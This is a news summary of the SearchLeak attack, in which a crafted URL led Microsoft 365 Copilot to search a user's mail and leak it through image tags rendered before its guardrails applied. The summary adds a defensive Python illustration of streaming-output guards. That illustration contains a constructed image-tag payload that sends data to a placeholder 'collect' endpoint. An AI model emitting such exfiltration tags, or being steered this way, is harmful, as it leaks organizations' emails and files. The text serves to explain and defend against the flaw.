
What happened: Researchers discovered that attackers could send victims a specially crafted URL that caused Copilot to search the user's emails, extract information, and exfiltrate it to an attacker-controlled server. The attack exploited a timing gap in Copilot's safety guardrails—before protection mechanisms could wrap output in code blocks, the application generated raw HTML that included image tags, causing the user's browser to send HTTP requests containing stolen data. Bing search, which is whitelisted in Copilot's content security policy, was used as an intermediary to route the requests to the attacker's domain. Microsoft fixed the vulnerabilities on Tuesday.
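The timing gap the summary describes, shown as an added illustration that is not taken from the article, the researchers' write-up or Microsoft's code: a client that streams model output as raw markup and only wraps the reply in a code block once the stream ends has already let the browser parse any image tag in it, so the guard has to run on every chunk. A per-chunk tag filter is still not enough, because a tag can straddle a chunk boundary; escaping markup characters per chunk holds regardless of where the boundaries fall. The chunk contents, the URL and the function names are constructed placeholders.

```python
"""Streaming model output: the guard must run per chunk, and per character.

Constructed example; not the SearchLeak payload and not any vendor's code.
"""
import html
import re

# Constructed stream: a markup tag deliberately split across chunk boundaries.
# The host and query value are placeholders, not real infrastructure.
CHUNKS = [
    "Summary of your inbox:\n<i",
    'mg src="https://placeholder.invalid/collect?d=',
    'meeting-notes-q3">\nDone.',
]

IMG_TAG = re.compile(r"<img\b", re.IGNORECASE)


def contains_live_img_tag(markup: str) -> bool:
    """Would a browser parsing this markup issue an image request?"""
    return IMG_TAG.search(markup) is not None


def render_late_guard(chunks):
    """Failure mode from the article: chunks reach the browser as raw markup and
    only the finished reply is wrapped in a code block.
    Returns (markup the browser already parsed, the too-late guarded version)."""
    raw_seen = "".join(chunks)  # already parsed by the browser at this point
    guarded = "<pre><code>" + html.escape(raw_seen) + "</code></pre>"
    return raw_seen, guarded


def render_per_chunk_tag_filter(chunks):
    """Guard runs per chunk, but as a tag-level rewrite. A tag split across two
    chunks is never seen whole by the filter, so the joined output still has it."""
    return "".join(IMG_TAG.sub("&lt;img", c) for c in chunks)


def render_per_chunk_escape(chunks):
    """Guard runs per chunk as a per-character escape of markup characters.
    Chunk boundaries cannot defeat it because no tag can survive an escaped '<'."""
    return "".join(html.escape(c) for c in chunks)


if __name__ == "__main__":
    raw, late = render_late_guard(CHUNKS)
    print("late guard, browser saw live tag:", contains_live_img_tag(raw))
    print("per-chunk tag filter leaves live tag:",
          contains_live_img_tag(render_per_chunk_tag_filter(CHUNKS)))
    print("per-chunk escape leaves live tag:",
          contains_live_img_tag(render_per_chunk_escape(CHUNKS)))
```

The late guard and the per-chunk tag filter both leave a live image tag in what the browser renders; only the per-character escape applied before each chunk is emitted does not. A content security policy does not substitute for this when, as the summary notes, an allowlisted domain can relay the request onward.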
Why it matters: The vulnerability targeted the Enterprise tier of Microsoft 365, meaning attackers could access not just personal data but anything an organization's user could see—emails, meeting invites, notes, SharePoint documents, OneDrive files, and other indexed business content. Depending on how M365 is configured, the blast radius could extend even wider across the environment. Even as Microsoft patches individual attack chains, the researchers note that there is no known way to fix the underlying cause of such vulnerabilities, so similar exploits are likely to emerge in the future.
What to watch: The researchers named the attack SearchLeak and published their findings on Monday. Because the attack relies on a fundamental gap between when Copilot streams output and when safety guardrails activate, the cat-and-mouse cycle between attackers finding new circumventions and Microsoft constructing new protections is likely to continue.